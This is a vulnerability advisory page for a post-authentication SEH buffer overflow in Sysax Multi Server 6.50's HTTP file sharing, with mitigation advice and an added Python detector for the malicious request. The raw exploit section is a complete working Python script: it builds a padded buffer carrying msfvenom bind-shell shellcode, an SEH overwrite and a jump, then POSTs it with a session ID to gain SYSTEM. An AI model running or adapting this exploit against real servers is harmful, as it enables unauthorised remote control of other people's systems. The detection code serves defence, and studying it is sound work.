Vendor: Sysax Multi Server
By: Paul Purcell
CVSS: 7.5 (HIGH)
CWE: Remote Code Execution
Product Name: Sysax Multi Server
Affected Version From: 6.5
Affected Version To: 6.5
Patch Exists: YES
Platforms Tested: Windows XP SP3 English
2016

Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit

This is a post-authentication exploit that requires the HTTP file sharing service to be running on Sysax Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the service. Once exploited, the shellcode runs with SYSTEM privileges. In this example, we attack folder_ in dltslctd_name1.htm. The root path of the user shouldn't break the buffer offset in the stack, though the user will need to have permission to delete folders. If the user has file delete permissions, file_ will work as well. mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can be modified to adapt to a user's permissions.

Mitigation:

Update to the latest version (6.51) which contains the patch.
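
Where the update cannot be applied immediately, the request described on this page can be flagged at a reverse proxy or in captured traffic. The following is an added example, not part of the original advisory or exploit: it checks POSTs to /scgi for the named pages and reports folder_ or file_ values that are oversized, contain NOP runs, or contain non-printable bytes. The 1024-byte ceiling, the treatment of mk_folder1_name1 as a pid value, the helper names and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Page names come from the advisory text; treating mk_folder1_name1 as a
# pid value like dltslctd_name1 is an assumption.
WATCHED_PIDS = {"dltslctd_name1.htm", "mk_folder1_name1.htm"}
FIELD_RE = re.compile(rb"(folder_|file_)([^\r\n]*)")
MAX_VALUE_LEN = 1024                    # assumed ceiling for a legitimate name
NOP_RUN_RE = re.compile(rb"\x90{16,}")  # long run of x86 NOP bytes


def inspect_request(raw: bytes) -> list:
    """Return the reasons a raw HTTP request matches the overflow pattern."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    if len(parts) != 3:
        return ["malformed request line"]
    method, target, _version = parts
    url = urlsplit(target)
    pid = parse_qs(url.query).get("pid", [""])[0]
    if method != "POST" or url.path != "/scgi" or pid not in WATCHED_PIDS:
        return []
    reasons = []
    for match in FIELD_RE.finditer(body):
        name, value = match.group(1).decode(), match.group(2)
        if len(value) > MAX_VALUE_LEN:
            reasons.append(f"{name} value is {len(value)} bytes")
        if NOP_RUN_RE.search(value):
            reasons.append(f"{name} value contains a NOP run")
        if any(b < 0x20 or b > 0x7e for b in value):
            reasons.append(f"{name} value contains non-printable bytes")
    return reasons


def build_request(pid: str, field: bytes) -> bytes:
    """Build constructed sample traffic (filler only) to exercise the check."""
    line = f"POST /scgi?sid={'0' * 40}&pid={pid} HTTP/1.1\r\n".encode()
    return line + b"Host: fileserver.example\r\n\r\n" + field


# Constructed samples; other.htm is a hypothetical page name.
NORMAL = build_request("dltslctd_name1.htm", b"folder_reports")
OVERSIZED = build_request("dltslctd_name1.htm",
                          b"folder_" + b"A" * 30000 + b"\x90" * 64)
OTHER_PAGE = build_request("other.htm", b"folder_" + b"A" * 30000)

if __name__ == "__main__":
    for label, req in (("normal", NORMAL), ("oversized", OVERSIZED)):
        print(label, inspect_request(req))
```
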

Exploit-DB raw data:

# Exploit Title: Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit
# Date: 03/21/2016
# Exploit Author: Paul Purcell
# Contact: ptpxploit at gmail
# Vendor Homepage: http://www.sysax.com/
# Vulnerable Version Download: http://download.cnet.com/Sysax-Multi-Server/3000-2160_4-76171493.html (6.50 as of posting date)
# Version: Sysax Multi Server 6.50
# Tested on: Windows XP SP3 English
# Category: Remote Code Execution
#
# Timeline: 03/11/16 Bug found
#           03/14/16 Vendor notified
#           03/17/16 Vendor acknowledges issue and publishes patch (6.51)
#           03/21/16 Exploit Published
#
# Summary:  This is a post-authentication exploit that requires the HTTP file sharing service to be running on
#           Sysax Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the
#           service. Once exploited, the shellcode runs with SYSTEM privileges.  In this example, we attack folder_
#           in dltslctd_name1.htm.  The root path of the user shouldn't break the buffer offset in the stack, though
#           the user will need to have permission to delete folders.  If the user has file delete permissions, file_
#           will work as well.  mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can
#           be modified to adapt to a user's permissions.

import httplib

target = 'webbackup'
port = 80
sid = '57e546cb7204b60f0111523409e49bdb16692ab5'            #retrieved from browser URL after login
#example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm

#msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "\x00\x0a"

shell=("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd7\xae"
"\x73\xe9\x83\xeb\xfc\xe2\xf4\x2b\x46\xf1\xe9\xd7\xae\x13\x60"
"\x32\x9f\xb3\x8d\x5c\xfe\x43\x62\x85\xa2\xf8\xbb\xc3\x25\x01"
"\xc1\xd8\x19\x39\xcf\xe6\x51\xdf\xd5\xb6\xd2\x71\xc5\xf7\x6f"
"\xbc\xe4\xd6\x69\x91\x1b\x85\xf9\xf8\xbb\xc7\x25\x39\xd5\x5c"
"\xe2\x62\x91\x34\xe6\x72\x38\x86\x25\x2a\xc9\xd6\x7d\xf8\xa0"
"\xcf\x4d\x49\xa0\x5c\x9a\xf8\xe8\x01\x9f\x8c\x45\x16\x61\x7e"
"\xe8\x10\x96\x93\x9c\x21\xad\x0e\x11\xec\xd3\x57\x9c\x33\xf6"
"\xf8\xb1\xf3\xaf\xa0\x8f\x5c\xa2\x38\x62\x8f\xb2\x72\x3a\x5c"
"\xaa\xf8\xe8\x07\x27\x37\xcd\xf3\xf5\x28\x88\x8e\xf4\x22\x16"
"\x37\xf1\x2c\xb3\x5c\xbc\x98\x64\x8a\xc6\x40\xdb\xd7\xae\x1b"
"\x9e\xa4\x9c\x2c\xbd\xbf\xe2\x04\xcf\xd0\x51\xa6\x51\x47\xaf"
"\x73\xe9\xfe\x6a\x27\xb9\xbf\x87\xf3\x82\xd7\x51\xa6\x83\xdf"
"\xf7\x23\x0b\x2a\xee\x23\xa9\x87\xc6\x99\xe6\x08\x4e\x8c\x3c"
"\x40\xc6\x71\xe9\xc6\xf2\xfa\x0f\xbd\xbe\x25\xbe\xbf\x6c\xa8"
"\xde\xb0\x51\xa6\xbe\xbf\x19\x9a\xd1\x28\x51\xa6\xbe\xbf\xda"
"\x9f\xd2\x36\x51\xa6\xbe\x40\xc6\x06\x87\x9a\xcf\x8c\x3c\xbf"
"\xcd\x1e\x8d\xd7\x27\x90\xbe\x80\xf9\x42\x1f\xbd\xbc\x2a\xbf"
"\x35\x53\x15\x2e\x93\x8a\x4f\xe8\xd6\x23\x37\xcd\xc7\x68\x73"
"\xad\x83\xfe\x25\xbf\x81\xe8\x25\xa7\x81\xf8\x20\xbf\xbf\xd7"
"\xbf\xd6\x51\x51\xa6\x60\x37\xe0\x25\xaf\x28\x9e\x1b\xe1\x50"
"\xb3\x13\x16\x02\x15\x83\x5c\x75\xf8\x1b\x4f\x42\x13\xee\x16"
"\x02\x92\x75\x95\xdd\x2e\x88\x09\xa2\xab\xc8\xae\xc4\xdc\x1c"
"\x83\xd7\xfd\x8c\x3c")

arg="folder_"                       #can also be changed to file_ if user has file delete permissions
pid="dltslctd_name1"                #Can be changed, though padding will need to be updated as well
junk1="A"*26400                     #Initial pile of junk
noppad="\x90"*296                   #Place to land from our long jump and before our shellcode
junkfill="\x90"*(768-len(shell))    #Fill in after our shellcode till nseh    
nseh="\xeb\x06\x90\x90"             #Short jump over SEH
seh="\xd7\x2a\x92\x5d"              #pop esi # pop edi # ret RPCNS4.dll
jump="\xe9\x13\xfc\xff\xff"         #jump back 1000 bytes for plenty of room for your shellcode
junk2="D"*9500                      #Junk at the end


buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2)

 
head = "Host: Wee! \r\n"
head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\r\n"
head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
head += "Accept-Language: en-us,en;q=0.5\r\n"
head += "Accept-Encoding: gzip, deflate\r\n"
head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm\r\n"
head += "Proxy-Connection: keep-alive\r\n"
head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425\r\n"
head += "Content-Length: 1337\r\n"
head += "If-Modified-Since: *\r\n"
head += "\r\n"
head += "-----------------------------217830224120\r\n"
head += "\r\n"
head += "\r\n"
head += "\r\n"
head += buff

conn = httplib.HTTPConnection(target,port)
conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)